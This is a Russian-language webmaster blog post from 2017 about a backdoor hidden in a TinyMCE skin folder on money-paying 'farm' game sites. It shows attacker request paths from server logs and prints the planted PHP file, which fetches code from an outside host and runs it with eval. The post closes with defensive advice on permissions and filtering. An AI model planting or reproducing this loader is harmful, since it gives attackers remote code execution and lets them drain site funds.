Загрузка...

Уязвимость с кнопкой button_pt.html

Сегодня поговорим о такой вещи как мошенники выводят обычно деньги с кошельков игр с выводом денег не входя ни в панель администратора ни делая аккаунтов. Я не собираюсь обучать и рассказывать в подробностях как это сделать, что бы не было желающих поживиться за чужой счёт а расскажу просто как себя обезопасить начинающему администратору фермы.

Изучив логи запросов домена одного из обратившихся клиентов я заметил что проблема как таковая лежит в панели управления его игры.

Кнопка button_pt.html

GET /js/editor/jscripts/tiny_mce/themes/simple/skins/o2k7/img/images/license.php?money


GET /js/editor/jscripts/tiny_mce/themes/simple/skins/o2k7/img/button_pt.html?money&pay=P3868870


Если у вас обнаруживается такой скрипт запроса у себя в файлах то поздравляю вы обладатель сайта с уязвимостью. Данная уязвимость не обязательно может быть именно HTML или вообще php файлом.

Сейчас очень часто вирусы выкладывают в изображения то есть этот скрипт еще может храниться и в простой картинке которая есть на вашем сайте проверьте все иконки да и вообще все картинки вашего скрипт.

Вот к чему ведет данный скрипт:

 button_pt.html:<?PHP 
$content = file_get_contents("http://fruit-farm.org/return.php"); 
eval($content); 
?>  


То есть при данном запросе идет отдельная страница с кнопкой button_pt.html ( бабло кнопка) с которой мошенники и выводят все деньги за считанные секунды.

Принимаем меры:

Самый простой способ проверить все скрипты на уязвимость здесь

Далее если все чисто то на этом не стоит останавливаться а нужно обезопасить себя.

1. Поставить права на папку tiny_mce (права доступа на 400) а лучше удалить ее к чертям эту папку.

2. Проверить фильтрацию на всех модулях если нет то сделать.

На этом все, будьте всегда внимательно проверяйте скачанные скрипты на уязвимости.

Хотите больше скриптов и новостей? Отблагодари авторов!
Пройди по ссылкам ниже...



    Уязвимость в модуле аватарики

    Уязвимость в модуле аватарики
    Есть еще один способ взлома,через форму загрузки аватарки. Суть в том что если не стоит фильтрация именно на этот модуль, а если быть точнее то, фильтрация должна стоять на загрузку разрешений png, gif, jpg, то есть на сами картинки, если убрать данную

    Скрипт обменника валюты Money Exchange 2.0

    Скрипт обменника валюты Money Exchange 2.0
    Скрипт обменника валюты Money Exchange 2.0 создав свой обменник валют вы можете легко контролировать валюту и курс обмена одним касанием объектов использовать панель администратора. Обратите внимание, что этот сценарий не использует API для любого

    Проблемы с кодировкой и различные символы место текста

    Проблемы с кодировкой и различные символы место текста
    Очень часто многие сталкиваются с такой проблемой, что после установки скрипта букса MFS или других подобных скриптов у них вместо русского текста отображаются знаки вопроса или ещё какие либо не понятные символы. Дело в том что часто, при переносе сайта

    Продвижение сайта в Google Images

    Продвижение сайта в Google Images
    Существует множество всяких способов как получить дополнительный трафик на ваш сайт и многие из них вам уже известны. В этой статье мы поговорим о таком способе как оптимизация изображений на сайте, благодаря которой их можно будет найти с помощью Google

    Как защититься от XSS атаки? Устранить уязвимости скрипта

    Как защититься от XSS атаки? Устранить уязвимости скрипта
    Как защититься от XSS атаки и устранить уязвимость? Думаю, большинство вебмастеров знает, что такое XSS-атака? А вам известно, что в интернете множество сайтов уязвимы или вообще не имеют защиты! А дело всё в том, что много всяких Х- специалистов.


Просмотров: 822
Добавлено: 3-02-2017, 09:09
Комментарии
  1. hdhewn | ?руппа: Гости | 3 февраля 2017 16:34

    :) А теперь посмотрите сюда. Вот ссылка на оригинальную статью : http://monit-ff.ru/105-knopka-button_pthtml-ili-kak-vyvodyat-babki-moshenniki-s
    -ferm.html
    Сравните даты создания и все поймете.

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.
loading...
Наверх
[X]
Добро пожаловать на сайт!

Войти | Зарегистрироваться